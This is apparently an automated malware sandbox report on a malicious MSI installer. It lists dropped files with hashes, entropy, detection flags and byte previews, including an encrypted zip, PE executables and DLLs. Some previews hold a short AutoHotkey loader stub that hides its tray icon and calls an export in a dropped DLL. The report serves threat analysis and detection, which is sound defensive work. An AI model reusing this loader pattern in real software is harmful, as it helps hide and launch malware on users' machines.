SHA-512:	3E32FAF05EE98EACD3CDEFB625F9926C2D72D1CA7670C5E849DF5953A82AFD9E13FF0CF04482D0290CE63F9A1EAB0A4405BAC1DDAA8EE73E9FAE6424F4F401D0
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 27%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...O..a..................\..N........\.......\...@...........................k...................................... _.......^..B....g......................@_.<3....................................................^.0....._......................text.....\.......\................. ..`.itext........\..0....\............. ..`.data....A....\..B....\.............@....bss........ ^..........................idata...B....^..D....].............@....didata......._......>^.............@....edata....... _......N^.............@..@.rdata..E....0_......P^.............@..@.reloc..<3...@_..4...R^.............@..B.rsrc.........g.......f.............@..@..............k.......j.............@..@........................................................

C:\Users\user\AppData\Roaming\u0IjY7UrZ\RDAg.zip Download File
Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	2908351
Entropy (8bit):	7.998373270983528
Encrypted:	true
SSDEEP:	49152:/9PPgat4tNTix7tkP6sr7bee8yg2MheWwcaOhKYwWcF4iy:/t4Y4tq7tYr358ygLbaPHo
MD5:	34D5B2BFE09B99E78BCB81330353734F
SHA1:	F278B4E934F0162DE73A6CB61B79E535B15277DB
SHA-256:	D61B135F42F377DC95D6CFFA3745FA2635C0632BA841AF8AC7C4AF10FC238D22
SHA-512:	6D02BCA6783AAE5F65B1709FDFDEEF9D8D8ABF66D87A9D991007BD41E4EA359B9E11E0211890069B740475E6F82B2A65BCA5F21FCBC5D533A913E9C5AE006B61
Malicious:	false
Preview:	PK........H..R...Jr...........Vk5OSNAZ1qGr0gp2STA6jj7mn.\}`.....J....x.S......M......I......(..Bz.Z.a..BH.9.f9?Zj..R.a[..J../.s`Q...-m.v...C....f..@.....=...7o.y.....n...p.g..q\'.......o.5..v..<.....Om.i\..O...39w.q...r>..g.xw...)....\|v..22.=...;...lio..[{..{...k....z.............nI.!...;..}.7...k....k>ug..&y..s.b...s<.&.;.YL.L...-..[...I.8'..t...6s....5.u...#.x.......7...........m..<..a]...=.L'...Z/..AknX.............'.......t4...T0....N../v.....D..5...x...?S...........HL..Tfm.Y.3.7.......W.rbv..^..../}.'.i. .v.......N...k...T]Y...+.Z.=.^W]...;...;.2.]9.9.....m.x..s3PBz.k.'G.5...s....I.5.w..vJ=.`u@M....(..U..A-..p..unF.Ae..y2'Z......'...)m..TR..Rm.hG..p.S..Q..<Ny..(..J.Z..-.....spR..*...O:...t.......=i.R.......L.zc....FK..-.L.u.f..c^&...S.S.Y.q...&O.....&.Ma.......;.(..~...U...%....E.K....<5{9..._...M.`.T<..Q.......V..1...o(.&.r..2j.$...}V...r.c...H....+2..f.0...vO.4..br.I.....f.'N..U..\|6.:...N....'.v..,f...4-.X....3>F.......(...k..O.

C:\Users\user\AppData\Roaming\u0IjY7UrZ\Vk5OSNAZ1qGr0gp2STA6jj7mn Download File
Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	905728
Entropy (8bit):	6.490983331614666
Encrypted:	false
SSDEEP:	24576:Do59ch+IzJ5XcLfeaFhwG9L53KmZ0s09:D0m+2JA5amZN0
MD5:	01F601DA6304451E0BC17CF004C97C43
SHA1:	1AA363861D1CFC45056068DE0710289EBBFCB886
SHA-256:	945ADADA6CF6698B949359D9B395A5F905989D0D1EB84F537DE492ECC1263148
SHA-512:	CC74C0B016AB1F53069F6FFBE1E35373090A64AD5630CEFBB70E72FEBDD00FB2D885838E5B9836382BF4B160998A08D7CE149071C73B10AA4320BCA00805CB6B
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 6%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.S.7.=.7.=.7.=...6.=.,d....=.,d...=.>...0.=.>...*.=.7.<...=.,d....=.,d....=.,d..6.=.,d..6.=.Rich7.=.........PE..L...W..`.........................................@..........................`................@.............................D...,.......h............................................................................................................text...q........................... ..`.rdata.."\.......^..................@..@.data....... ...4..................@....rsrc...h............:..............@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\u0IjY7UrZ\ls50U85K1K27YxuXbH88b17F7 Download File
Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	179
Entropy (8bit):	5.636577076595089
Encrypted:	false
SSDEEP:	3:bO8XmvLULVKK2AbNAkENXA59z1Z3TsQieHt1hKDVGam5HBSFP3TsQisOk/Jyn:bO8WTSVKKn+NNQjP3Ts5eNrKDVvmDE3A
MD5:	3D76129C7FAADB401AF6AF86143256AF
SHA1:	7AA3C0582081EE8D141EE605E21EAC7AE3FAB4C5
SHA-256:	AC0E0AAFCAB69E4F471BD8C7F91238EAD6931B8BAE074EC5852762AF551037C1
SHA-512:	F98475C0983F13ED154E069AA3BBF7001D35BA532D0413D8A3292113F5A671C405A304D59EDA668F0B4BFB190FDA10ED4688DEE8E2858AFEE5018AA3A76E4B83
Malicious:	false
Reputation:	unknown
Preview:	#NoEnv..#NoTrayIcon..#SingleInstance off..SetWorkingDir %A_ScriptDir%..wjXVPy9CerJ669o2uGyucPZ := "HPDofzXZkq.dll"..DllCall(wjXVPy9CerJ669o2uGyucPZ . "\QFCOk60Vb67WT0MzRrlP2ub")..

C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.ahk (copy) Download File
Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	179
Entropy (8bit):	5.636577076595089
Encrypted:	false
SSDEEP:	3:bO8XmvLULVKK2AbNAkENXA59z1Z3TsQieHt1hKDVGam5HBSFP3TsQisOk/Jyn:bO8WTSVKKn+NNQjP3Ts5eNrKDVvmDE3A
MD5:	3D76129C7FAADB401AF6AF86143256AF
SHA1:	7AA3C0582081EE8D141EE605E21EAC7AE3FAB4C5
SHA-256:	AC0E0AAFCAB69E4F471BD8C7F91238EAD6931B8BAE074EC5852762AF551037C1
SHA-512:	F98475C0983F13ED154E069AA3BBF7001D35BA532D0413D8A3292113F5A671C405A304D59EDA668F0B4BFB190FDA10ED4688DEE8E2858AFEE5018AA3A76E4B83
Malicious:	false
Reputation:	unknown
Preview:	#NoEnv..#NoTrayIcon..#SingleInstance off..SetWorkingDir %A_ScriptDir%..wjXVPy9CerJ669o2uGyucPZ := "HPDofzXZkq.dll"..DllCall(wjXVPy9CerJ669o2uGyucPZ . "\QFCOk60Vb67WT0MzRrlP2ub")..

C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe (copy) Download File
Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	905728
Entropy (8bit):	6.490983331614666
Encrypted:	false
SSDEEP:	24576:Do59ch+IzJ5XcLfeaFhwG9L53KmZ0s09:D0m+2JA5amZN0
MD5:	01F601DA6304451E0BC17CF004C97C43
SHA1:	1AA363861D1CFC45056068DE0710289EBBFCB886
SHA-256:	945ADADA6CF6698B949359D9B395A5F905989D0D1EB84F537DE492ECC1263148
SHA-512:	CC74C0B016AB1F53069F6FFBE1E35373090A64AD5630CEFBB70E72FEBDD00FB2D885838E5B9836382BF4B160998A08D7CE149071C73B10AA4320BCA00805CB6B
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.S.7.=.7.=.7.=...6.=.,d....=.,d...=.>...0.=.>...*.=.7.<...=.,d....=.,d....=.,d..6.=.,d..6.=.Rich7.=.........PE..L...W..`.........................................@..........................`................@.............................D...,.......h............................................................................................................text...q........................... ..`.rdata.."\.......^..................@..@.data....... ...4..................@....rsrc...h............:..............@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\6296d4.msi Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {3E67FA5E-8FCD-475D-9775-2AF171CB93BE}, Number of Words: 10, Subject: Fichero, Author: VHETNiUaeF, Name of Creating Application: Advanced Installer 17.7 build 8a137570, Template: ;3082, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
Category:	dropped
Size (bytes):	3771904
Entropy (8bit):	6.61649185405463
Encrypted:	false
SSDEEP:	49152:myuYdA7thT62DmPCSuAnl2IsZqhgE6suyF9gW38znuA9oWVRT7BA:8YO7thIHXBgw8zzeCA
MD5:	2917D9416AB9D90BE57DA089357592B3
SHA1:	4B6B50BFFDCEE566E37646F2D17666EF7A39863C
SHA-256:	6ACE3B241920068501FF00B28A7F8C04242325495EB85279F0A231158B5CD1A9
SHA-512:	1354EACFEAA8B55BED80A9CC1E38A4CF130C25962415E7A7BB9CF8629A9E0F539A5B6F1519728A09D1AEEA4ECA5B2BFEFCF1B412721D1C1004B3339E0A72932F
Malicious:	false
Reputation:	unknown
Preview:	......................>...................:...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................c...............1...%........................................................................................... ...!..."...#...$.../...0...'...(...)...*...+...,...-...........2...6...B...3...4...5...8...7...?...9...:...;...<...=...>...A...@...C.......D...H...E...F...G...)...I...b...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a.......d...u...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...v.......w...x...y...z...

C:\Windows\Installer\MSI9AEB.tmp Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	390304
Entropy (8bit):	6.42232102371954
Encrypted:	false
SSDEEP:	6144:JyVt6fHYx+8GOL2bS9Li0k9TY1fuMuwLspJaDsAkvAO5cSrQVKlbCS4T73:6tkeYbS9L/RuMuwLocopMlVSCS4T7
MD5:	D90AB57E6C584F90FBBEA74B566216E3
SHA1:	4616E59AED33848F5870E5E1FE865F932721A162
SHA-256:	44FFC4959BE0DDB18B02D59C75E78E3E721992E362A2F90CAE19ADB3271886B9
SHA-512:	5B13FE1E34F4EC05CCACAF57FC67F49993E5D950E5396E715686749DDAE0B18D5F2D70B3CD3A9ADA3389DB269213E915F19FD10A54330EAECD765475844E6695
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......j<R..]<..]<..]<.:6?.#]<.:69..]<..,8.!]<..,?.9]<..,9.g]<.:68.7]<.:6:./]<.:6=.1]<..]=.a\<../5.\|]<../<./]<.././]<..]../]<../>./]<.Rich.]<.........PE..L....>._.........."!.........,.......I....................................... ......OY....@.........................@x..................0........................B......p...................@.......x...@............................................text..._........................... ..`.rdata..............................@..@.data...l...........................@....rsrc...0...........................@..@.reloc...B.......D..................@..B........................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI9D7C.tmp Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	390304
Entropy (8bit):	6.42232102371954
Encrypted:	false
SSDEEP:	6144:JyVt6fHYx+8GOL2bS9Li0k9TY1fuMuwLspJaDsAkvAO5cSrQVKlbCS4T73:6tkeYbS9L/RuMuwLocopMlVSCS4T7
MD5:	D90AB57E6C584F90FBBEA74B566216E3
SHA1:	4616E59AED33848F5870E5E1FE865F932721A162
SHA-256:	44FFC4959BE0DDB18B02D59C75E78E3E721992E362A2F90CAE19ADB3271886B9
SHA-512:	5B13FE1E34F4EC05CCACAF57FC67F49993E5D950E5396E715686749DDAE0B18D5F2D70B3CD3A9ADA3389DB269213E915F19FD10A54330EAECD765475844E6695
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......j<R..]<..]<..]<.:6?.#]<.:69..]<..,8.!]<..,?.9]<..,9.g]<.:68.7]<.:6:./]<.:6=.1]<..]=.a\<../5.\|]<../<./]<.././]<..]../]<../>./]<.Rich.]<.........PE..L....>._.........."!.........,.......I....................................... ......OY....@.........................@x..................0........................B......p...................@.......x...@............................................text..._........................... ..`.rdata..............................@..@.data...l...........................@....rsrc...0...........................@..@.reloc...B.......D..................@..B........................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI9ED5.tmp Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	390304
Entropy (8bit):	6.42232102371954
Encrypted:	false
SSDEEP:	6144:JyVt6fHYx+8GOL2bS9Li0k9TY1fuMuwLspJaDsAkvAO5cSrQVKlbCS4T73:6tkeYbS9L/RuMuwLocopMlVSCS4T7
MD5:	D90AB57E6C584F90FBBEA74B566216E3
SHA1:	4616E59AED33848F5870E5E1FE865F932721A162
SHA-256:	44FFC4959BE0DDB18B02D59C75E78E3E721992E362A2F90CAE19ADB3271886B9
SHA-512:	5B13FE1E34F4EC05CCACAF57FC67F49993E5D950E5396E715686749DDAE0B18D5F2D70B3CD3A9ADA3389DB269213E915F19FD10A54330EAECD765475844E6695
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......j<R..]<..]<..]<.:6?.#]<.:69..]<..,8.!]<..,?.9]<..,9.g]<.:68.7]<.:6:./]<.:6=.1]<..]=.a\<../5.\|]<../<./]<.././]<..]../]<../>./]<.Rich.]<.........PE..L....>._.........."!.........,.......I....................................... ......OY....@.........................@x..................0........................B......p...................@.......x...@............................................text..._........................... ..`.rdata..............................@..@.data...l...........................@....rsrc...0...........................@..@.reloc...B.......D..................@..B........................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI9FD0.tmp Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	390304
Entropy (8bit):	6.42232102371954
Encrypted:	false
SSDEEP:	6144:JyVt6fHYx+8GOL2bS9Li0k9TY1fuMuwLspJaDsAkvAO5cSrQVKlbCS4T73:6tkeYbS9L/RuMuwLocopMlVSCS4T7
MD5:	D90AB57E6C584F90FBBEA74B566216E3
SHA1:	4616E59AED33848F5870E5E1FE865F932721A162
SHA-256:	44FFC4959BE0DDB18B02D59C75E78E3E721992E362A2F90CAE19ADB3271886B9
SHA-512:	5B13FE1E34F4EC05CCACAF57FC67F49993E5D950E5396E715686749DDAE0B18D5F2D70B3CD3A9ADA3389DB269213E915F19FD10A54330EAECD765475844E6695
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......j<R..]<..]<..]<.:6?.#]<.:69..]<..,8.!]<..,?.9]<..,9.g]<.:68.7]<.:6:./]<.:6=.1]<..]=.a\<../5.\|]<../<./]<.././]<..]../]<../>./]<.Rich.]<.........PE..L....>._.........."!.........,.......I....................................... ......OY....@.........................@x..................0........................B......p...................@.......x...@............................................text..._........................... ..`.rdata..............................@..@.data...l...........................@....rsrc...0...........................@..@.reloc...B.......D..................@..B........................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSIA196.tmp Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	1571
Entropy (8bit):	5.333738244538581
Encrypted:	false
SSDEEP:	24:FxgduBXydmGrlEu6B0tgjZv+xJKrE373+5dzF7kkzT6cvPXqGcV/p4w4RygF:FxYYiR54Be6Qx2F7vfN7RBF
MD5:	82867EA55404374F7F93279C7FB6E36F
SHA1:	DCB877FCD6A1EBF6D228BEAE073809986F56D2EF
SHA-256:	B5310795D10C366C094773F8D86881FCFC659C8541C46A6E0778E510F3EABFB5
SHA-512:	692C80E5E94BC1D901E7E7B99C9CD9C07C7DF06176639C8205F46E96BF627F27F21BE675BEB60DBBE93C7250E40C14D8C2509A2DC52F1599D908DB8A0BCF313B
Malicious:	false
Reputation:	unknown
Preview:	...@IXOS.@.....@vucS.@.....@.....@.....@.....@.....@......&.{8E7E373A-E5DB-413B-AEBC-9EEAF6000AEA}..Fichero..C003I7GF0S8F920G600203.msi.@.....@.....@.....@........&.{3E67FA5E-8FCD-475D-9775-2AF171CB93BE}.....@.....@.....@.....@.......@.....@.....@.......@......Fichero......Rollback..A.c.c.i...n. .d.e. .r.e.s.t.a.u.r.a.c.i...n.:.....RollbackCleanup..Quitando copias de seguridad..Archivo: [1]...@.......@........ProcessComponents'.Actualizando el registro de componentes...@.....@.....@.]....&.{695B5255-7208-415A-A640-57FD170FF7EB}..C:\Users\Public\.@.......@.....@.....@......&.{CC4F17AA-BE4F-4AF8-B3B1-1A89B0A67A2C} .01:\Software\VHETNiUaeF\Fichero\.@.......@.....@.....@......&.{15758A0D-A2A6-4A02-827C-1630D80F8A37}2.C:\Users\user\AppData\Roaming\VHETNiUaeF\Fichero\.@.......@.....@.....@......&.{EB60B538-7A9E-494E-AEFC-6E5A62962D2F}..C:\ProgramData\xy.txt.@.......@.....@.....@........CreateFolders..Creando carpetas..Carpeta: [1]"...C:\Users\Public\.@....".2.C:\Users\user\AppData\Roaming\

C:\Windows\Installer\MSIA1C6.tmp Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3181056
Entropy (8bit):	6.623005261501735
Encrypted:	false
SSDEEP:	49152:yA7thT62DmPCSuAnl2IsZqhgE6suyF9gW38znu:Z7thIHXBgw8z
MD5:	412C2F92D455DBE87A7B70BBBAD763C4
SHA1:	80BBE92A1B6AF742365700EEE8747188C502CF25
SHA-256:	1F69E86569726C571AA96DCA7CA35DEE35BAFE7CF44BAC1B919DA4F5836236F2
SHA-512:	C89938FCA943253E5DC456DE3BBE1F1B411DBE4272046982BE355CC44BBFE978F948A83A4CA572AFA6B68659F4D89F971AFF5001D84A33AAB62F271858AE8A4B
Malicious:	false
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...24.a....................................+...@..........................`1.......................................,.......,..5....0.......................,.....................................................T.,.P.....,.h....................text............................. ..`.itext..$+......,................. ..`.data...@.....+.......*.............@....bss.....r....,..........................idata...5....,..6....+.............@....didata.h.....,.......,.............@....edata........,...... ,.............@..@.rdata..E.....,......",.............@..@.reloc........,......$,.............@..B.rsrc.........0......./.............@..@.............`1.......0.............@..@........................................................

C:\Windows\Installer\SourceHash{8E7E373A-E5DB-413B-AEBC-9EEAF6000AEA} Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.1706589601315378
Encrypted:	false
SSDEEP:	12:JSbX72Fj+6AGiLIlHVRp9h/7777777777777777777777777vDHFzV4RhlyuWt/z:JvQI5Zr4RXyWF
MD5:	D1CC3205F710095BEA7132AB006410F3
SHA1:	1CD02F096B5FD8BF5BBBFBB996B74A94FCF67E3B
SHA-256:	2204F03FBF06055618ADA7999C61904AED00C15E1B977B23E661654B006E1230
SHA-512:	82088FF9F0826A8130CEFAD7D46F3E9D72B9AB808D74073B7E3C7A4D17A39E91B3E8902A0915EB874D519E4F691EBEEE05EF507102177E1A2C878B47333B739B
Malicious:	false
Reputation:	unknown
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\inprogressinstallinfo.ipi Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.532142531250484
Encrypted:	false
SSDEEP:	48:O8PhzuRc06WXJcjT5dZDlitSCzAECiCy9oXtSC/T/r:Bhz1/jTRlsEECPP
MD5:	49A1BF1983A8A9736A5329C07109714D
SHA1:	D82B15BBD3ADED5710E519A894F1FFF72027603F
SHA-256:	AAEF0D91E81C954FF71493A94D7D2EB1301B3828D3E3A3155EE1EC46E8B38219
SHA-512:	2E628ADF8F70BFBC931A2F8AE3569A3DA9E9737485C7E4BC329A019ED146C4B6DC7BE9EBA401D253E30C2878AACB66E42EA763CB588E904705A0561C2B55925A
Malicious:	false
Reputation:	unknown
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	79122
Entropy (8bit):	5.282067101370901
Encrypted:	false
SSDEEP:	192:jmXs969ozNSkk3peTBYeHt0tfoI9qsjl0urmwYyig:yXs9UogeWeH29qclhmwYyig
MD5:	E51EBCEB64DC086A16AE832BE1EAB7BF
SHA1:	A1BBB0C8033538FFBB437D0AA0C843A7894ABE5B
SHA-256:	CAD92F8D40CB38EB7FC25A6383D035639F6792F65026096F083965B251B88F98
SHA-512:	D33B548CE2882AE37ED13FA72E7D8F97CD44C5B546A8B5A242D286F3C5E0C552D7CA80B55BEE5A8E480D9DB8373DD97005B4AA9FF03A6F7D9562E1C5C22A8411
Malicious:	false
Reputation:	unknown
Preview:	.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..07/23/2020 03:22:38.143 [320]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.Outlook, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 03:22:38.159 [320]: ngen returning 0x00000000..07/23/2020 03:22:38.222 [3748]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.Word, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 03:22:38.237 [3748]: ngen returning 0x00000000..07/23/2020 03:22:38.284 [64]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.Common.Implementation, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 03:22:38.300 [64]:

C:\Windows\Temp\~DF20A88BDC51178C56.TMP Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.532142531250484
Encrypted:	false
SSDEEP:	48:O8PhzuRc06WXJcjT5dZDlitSCzAECiCy9oXtSC/T/r:Bhz1/jTRlsEECPP
MD5:	49A1BF1983A8A9736A5329C07109714D
SHA1:	D82B15BBD3ADED5710E519A894F1FFF72027603F
SHA-256:	AAEF0D91E81C954FF71493A94D7D2EB1301B3828D3E3A3155EE1EC46E8B38219
SHA-512:	2E628ADF8F70BFBC931A2F8AE3569A3DA9E9737485C7E4BC329A019ED146C4B6DC7BE9EBA401D253E30C2878AACB66E42EA763CB588E904705A0561C2B55925A
Malicious:	false
Reputation:	unknown
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF24C0F8DA589AF6E5.TMP Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	0.12504706604224733
Encrypted:	false
SSDEEP:	24:krxyTxkr67WipVkr670kr67WipVkr678AEVkryjCyZTV2BwG7VYx+k5nwE:krkTetSCAtSCzAECiCy9oDEZq
MD5:	CBB82179B89A5C8C5885602165BECDAC
SHA1:	33EF8B43FDF2608D9851F5549237FED3A6A2E5AB
SHA-256:	8FF03190945A68C7A6DA526B8F86AB7CF761EBEE0D59768C85865484F194B5AD
SHA-512:	82AA61B586508C8BB14B926E40E79513EEC71D39D437FBEB11694805176E877410F875D4D044A3828864FF48E3FAA42CD4957FA2971D7C82A128D8B092078665
Malicious:	false
Reputation:	unknown
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF56FD29E18CB677CB.TMP Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2302974559753648
Encrypted:	false
SSDEEP:	48:zuoruTI+CFXJ3T5NzZDlitSCzAECiCy9oXtSC/T/r:z/rBPT9lsEECPP
MD5:	EA2546F5D9B8AB8F0871F8E8E43247B9
SHA1:	AD27E11C8D2BF10524C34B795535425BA719EE8C
SHA-256:	5DC1755591E4CE84FEA3F5659D79765CF3C41B2EE28F47924735E83324FA80B9
SHA-512:	4D0626B0D74E65BB141F98DC1C8667484C47CCAEB77232C454E56255B70166191A7C3D60D57B237F30BC007503F56B340F6B929E530D21BA9F07B8711FAB58E9
Malicious:	false
Reputation:	unknown
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF71C7C5E3B07B7728.TMP Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Reputation:	unknown
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF8A3D9097D8E12529.TMP Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Reputation:	unknown
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF97E6F32D032F956F.TMP Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Reputation:	unknown
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFB4C5B99142FB1897.TMP Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.532142531250484
Encrypted:	false
SSDEEP:	48:O8PhzuRc06WXJcjT5dZDlitSCzAECiCy9oXtSC/T/r:Bhz1/jTRlsEECPP
MD5:	49A1BF1983A8A9736A5329C07109714D
SHA1:	D82B15BBD3ADED5710E519A894F1FFF72027603F
SHA-256:	AAEF0D91E81C954FF71493A94D7D2EB1301B3828D3E3A3155EE1EC46E8B38219
SHA-512:	2E628ADF8F70BFBC931A2F8AE3569A3DA9E9737485C7E4BC329A019ED146C4B6DC7BE9EBA401D253E30C2878AACB66E42EA763CB588E904705A0561C2B55925A
Malicious:	false
Reputation:	unknown
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFBF53FD8D1AF0CBBB.TMP Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Reputation:	unknown
